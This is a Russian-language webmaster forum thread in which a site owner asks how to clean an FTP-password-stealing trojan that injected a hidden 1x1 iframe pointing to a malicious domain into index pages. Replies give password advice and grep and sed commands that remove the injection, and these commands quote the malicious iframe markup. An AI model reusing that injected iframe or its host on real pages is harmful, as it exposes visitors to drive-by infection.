mxsurikov

Рейтинг
4
Регистрация
04.05.2007
Пришел ответ от Яндекса!
AndyM:
100% рецепта от различной сетевой заразы к сожалению нет.
Есть методы минимизирующие риск. Обновляйте систему и антивирус почаще. ну и конечно пароли не хранить в ftp клиентах.

Спасибо.🚬

Пришел ответ от Яндекса!
mxsurikov:
Дримвавером, я попробую, а сам вирус он же где-то еще есть. Что бы он после очередного захода по паролям, на фтп не попал, какая лучшая защита?😕

Нет ответа.🙄

Пришел ответ от Яндекса!
ZAG:

если ssh нет и сайт большой, сочувствую, хотя, по идее, можно скачать бэкап на локальный комп и в Dreamweaver использовать функцию найти и заменить в файлах.
удачи

Дримвавером, я попробую, а сам вирус он же где-то еще есть. Что бы он после очередного захода по паролям, на фтп не попал, какая лучшая защита?😕

Пришел ответ от Яндекса!
lupus_bellus:
это просто проверить по дате изменения документа, если нет ssh.

Я уже сам походу лазил изменял страницу добавлением ссылок, это наверное не выявить.

Пришел ответ от Яндекса!

😒

VladiZlav:
Не знаю как данный конкретный вирус, но подобного рода вирусы могут заражать и другие страницы. Не так давно по собственному недосмотру столкнулся с подобным вирусом, так он заражал все файлы с расширениями *.php *.htm и т.д. в корневой директории сайта и в папках "news" и "forum" 🚬 Гадость конечно редкостная, но блин мой антивирь ее както пропустил... 🙄

Буду смотреть, жесть какая.

Спасибо.

Недавно выпал сайт из Яндекса
abbyevg:
Ясно, значит уберем, без проблем..
как же существуют другие сайты с каталогами..?

Наверно там как-то ровнее все.:)

Недавно выпал сайт из Яндекса
Kost:
Каталог ссылог - как раз за него и банят.

Ох хорошо я вовремя сообразил и удалил каталог.:)

Пришел ответ от Яндекса!
ZAG:
меняйте пароли на ftp, новые НЕ забивайте в тоталкоммандер или какой-либо другой ftp_клиент, т.к. троян их из программ этих и берет.

если у вас есть доступ к серверу по ssh, почистить будет проще.
Вроде прописывается эта дрянь только в index с любым расширением, но на всякий случай, все лучше проверить.
Делаете резервную копию всех файлов своего сайта.

Ищем, только ли в index-ах у нас этот код:
grep -r "http://fncarp.com/ind.php" *

если только в индексах, то ищите этот кусок и автоматом же заменяете его на пустое значение с помощью такого shell-скрипта:

for i in `find . -name index.\*`; do cp -p $i $i.old; cat $i.old | sed -e "s|\<iframe src\=\"http\:\/\/fncarp\.com\/ind\.php\" width\=\"1\" height\=\"1\" alt\=\"BYDLOSHKA\"\>\<\/iframe\>| |g" > $i; done

P.S.
это все в одну строку должно быть!

если в каких-то еще файлах есть, то `find . -type f` сделайте
так он все файлы просмотрит.

если ssh нет и сайт большой, сочувствую, хотя, по идее, можно скачать бэкап на локальный комп и в Dreamweaver использовать функцию найти и заменить в файлах.

удачи

Спасибо, а доступ по ssh можно наладить? У меня фтп и как я понял мне нужно скачать все индексы на лок диск и дрим вавером прочистить. Угу. А как же в будущем? Мне ведь надо будет заливать по фтп файлы. У меня стоит смарт фтп. Косперским можно защитить соединение же.

Пришел ответ от Яндекса!
AVV:
Ну, возьмите программу, например http://iocsha.narod.ru/header_v1.zip
и сделайте GET-запрос. Получите исходный код.

Вот нашел, а как теперь его удалить?😕

Пришел ответ от Яндекса!
AVV:
Да, именно вирус. Удачи.



Этого я не знаю. :)

<p align="center"><a href="http://top100.rambler.ru/top100/"><img height="31" alt="Rambler's Top100" width="88" border="0" src="http://top100-images.rambler.ru/top100/b8.gif" /> <!--end of Top100 logo --></a></p>

   </div>

	<div style="float: right;">

	<!--begin of Rambler's Top100 code -->

	<a href="http://top100.rambler.ru/top100/">

	<img src="http://counter.rambler.ru/top100.cnt?1064418" alt="" width=1 height=1 border=0></a>

	<!--end of Top100 code-->

	</div>

   <div class="clear"></div>

</div>





</body>

</html>

Я смотрю и уменя так, нет его в низу, как вы его нашли??? Я через Грин браузер смотрю и через просмотр HTML.

12
Всего: 20